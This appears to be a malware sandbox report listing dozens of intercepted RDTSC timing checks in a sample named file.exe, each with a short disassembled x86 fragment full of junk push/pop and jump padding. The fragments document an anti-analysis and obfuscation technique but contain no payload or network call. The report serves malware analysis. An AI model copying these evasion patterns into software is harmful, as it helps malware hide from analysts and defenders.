                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2CD1 second address: FB2CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2CD7 second address: FB2CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49A8F2A331h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F512F0 second address: F5131F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F49A854EE96h 0x0000000a pop edi 0x0000000b popad 0x0000000c js 00007F49A854EEB7h 0x00000012 push ebx 0x00000013 jmp 00007F49A854EEA3h 0x00000018 pop ebx 0x00000019 jl 00007F49A854EE9Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB044 second address: FBB04A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF3B4 second address: FBF3D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EEA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F49A854EE96h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF507 second address: FBF519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A32Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6D6C second address: FC6D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F49A854EE96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6D78 second address: FC6D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnc 00007F49A8F2A326h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC72C3 second address: FC72CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC72CB second address: FC730F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F49A8F2A326h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d popad 0x0000000e push edi 0x0000000f pushad 0x00000010 jmp 00007F49A8F2A333h 0x00000015 jmp 00007F49A8F2A334h 0x0000001a jnc 00007F49A8F2A326h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC730F second address: FC7313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7458 second address: FC7461 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7A33 second address: FC7A5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F49A854EEA3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F49A854EE9Ah 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7BF3 second address: FC7BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7BFC second address: FC7C0B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F49A854EE98h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9515 second address: FC9525 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F49A8F2A326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9525 second address: FC9529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCAAE2 second address: FCAB07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F49A8F2A326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F49A8F2A336h 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCAB07 second address: FCAB0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCD791 second address: FCD7A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A32Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCD7A7 second address: FCD7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5D15A second address: F5D177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F49A8F2A336h 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5D177 second address: F5D19C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EEA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jng 00007F49A854EEBCh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD0AFA second address: FD0B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A339h 0x00000007 jmp 00007F49A8F2A32Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f jc 00007F49A8F2A34Ah 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD70CC second address: FD70E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F49A854EE9Eh 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD70E3 second address: FD70E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5FCB second address: FD5FE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EE9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F49A854EEA2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5FE6 second address: FD5FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6597 second address: FD65C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EE9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F49A854EEA8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD65C7 second address: FD65D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD688E second address: FD689A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD689A second address: FD68A4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F49A8F2A326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD68A4 second address: FD68AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD68AA second address: FD68C3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F49A8F2A332h 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6B3F second address: FD6B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F49A854EE96h 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6DFC second address: FD6E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6E00 second address: FD6E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F49A854EEA3h 0x0000000b popad 0x0000000c pushad 0x0000000d push ecx 0x0000000e jmp 00007F49A854EEA9h 0x00000013 pop ecx 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6E3D second address: FD6E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6E43 second address: FD6E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6E4C second address: FD6E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB610 second address: FDB614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB8DB second address: FDB8E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB8E1 second address: FDB8F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007F49A854EE96h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBA64 second address: FDBA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBE75 second address: FDBE84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jo 00007F49A854EE96h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDC2EC second address: FDC2F1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDC5F6 second address: FDC604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F49A854EE96h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDC604 second address: FDC60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDC60B second address: FDC612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB341 second address: FDB347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE6F9 second address: FDE73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A854EEA5h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jmp 00007F49A854EEA8h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F49A854EEA1h 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9EF1C second address: F9EF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9EF28 second address: F9EF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9EF2F second address: F9EF34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F2D8 second address: F9F2FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EEA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F2FE second address: F9F304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F304 second address: DEFA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F49A854EE98h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 push dword ptr [ebp+122D14CDh] 0x00000029 sub di, 8184h 0x0000002e call dword ptr [ebp+122D28CCh] 0x00000034 pushad 0x00000035 cmc 0x00000036 ja 00007F49A854EE9Ch 0x0000003c xor eax, eax 0x0000003e jmp 00007F49A854EEA1h 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 mov dword ptr [ebp+122D1DA8h], edx 0x0000004d mov dword ptr [ebp+122D3822h], eax 0x00000053 mov dword ptr [ebp+122D1DA8h], ecx 0x00000059 mov esi, 0000003Ch 0x0000005e clc 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 mov dword ptr [ebp+122D1DA8h], eax 0x00000069 lodsw 0x0000006b sub dword ptr [ebp+122D1DA8h], eax 0x00000071 add eax, dword ptr [esp+24h] 0x00000075 xor dword ptr [ebp+122D1DA8h], esi 0x0000007b mov ebx, dword ptr [esp+24h] 0x0000007f jmp 00007F49A854EEA2h 0x00000084 clc 0x00000085 nop 0x00000086 jbe 00007F49A854EEA0h 0x0000008c push eax 0x0000008d push edx 0x0000008e pushad 0x0000008f popad 0x00000090 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F39D second address: F9F40F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 406CF96Ah 0x0000000e sub dword ptr [ebp+122D234Dh], esi 0x00000014 call 00007F49A8F2A329h 0x00000019 jns 00007F49A8F2A33Ah 0x0000001f push eax 0x00000020 jnc 00007F49A8F2A32Ah 0x00000026 mov eax, dword ptr [esp+04h] 0x0000002a jmp 00007F49A8F2A333h 0x0000002f mov eax, dword ptr [eax] 0x00000031 pushad 0x00000032 push esi 0x00000033 pushad 0x00000034 popad 0x00000035 pop esi 0x00000036 push edi 0x00000037 jnp 00007F49A8F2A326h 0x0000003d pop edi 0x0000003e popad 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F40F second address: F9F414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F414 second address: F9F419 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F630 second address: F9F675 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F49A854EE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c ja 00007F49A854EEB0h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 ja 00007F49A854EE9Eh 0x0000001c mov eax, dword ptr [eax] 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F675 second address: F9F679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F835 second address: F9F83B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F83B second address: F9F84C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F49A8F2A326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FCDA second address: F9FCE4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA000B second address: FA0030 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A32Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F49A8F2A32Ch 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0030 second address: FA0035 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0035 second address: F7F3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub dword ptr [ebp+122D17CFh], ebx 0x0000000e call dword ptr [ebp+122D21BCh] 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pushad 0x00000018 popad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop esi 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2D67 second address: FE2D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A854EEA6h 0x00000009 pop esi 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2D82 second address: FE2D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2D88 second address: FE2D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A854EEA1h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2D9D second address: FE2DA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2DA3 second address: FE2DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F49A854EE98h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F49A854EE9Dh 0x00000017 pop esi 0x00000018 jmp 00007F49A854EEA5h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jnl 00007F49A854EE96h 0x00000027 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2DE4 second address: FE2DE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2F1C second address: FE2F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A854EE9Ah 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2F2A second address: FE2F30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2F30 second address: FE2F64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EE9Ch 0x00000007 js 00007F49A854EE9Ah 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F49A854EEA8h 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE309C second address: FE30A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE30A5 second address: FE30AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE31DF second address: FE31E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE331D second address: FE3334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EE9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F49A854EEACh 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE34B0 second address: FE34D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F49A8F2A326h 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F49A8F2A336h 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5E45 second address: FE5E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5E49 second address: FE5E7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A334h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F49A8F2A336h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5E7B second address: FE5E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5E7F second address: FE5E83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5E83 second address: FE5E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5E8B second address: FE5E95 instructions: 0x00000000 rdtsc 0x00000002 js 00007F49A8F2A332h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5E95 second address: FE5E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
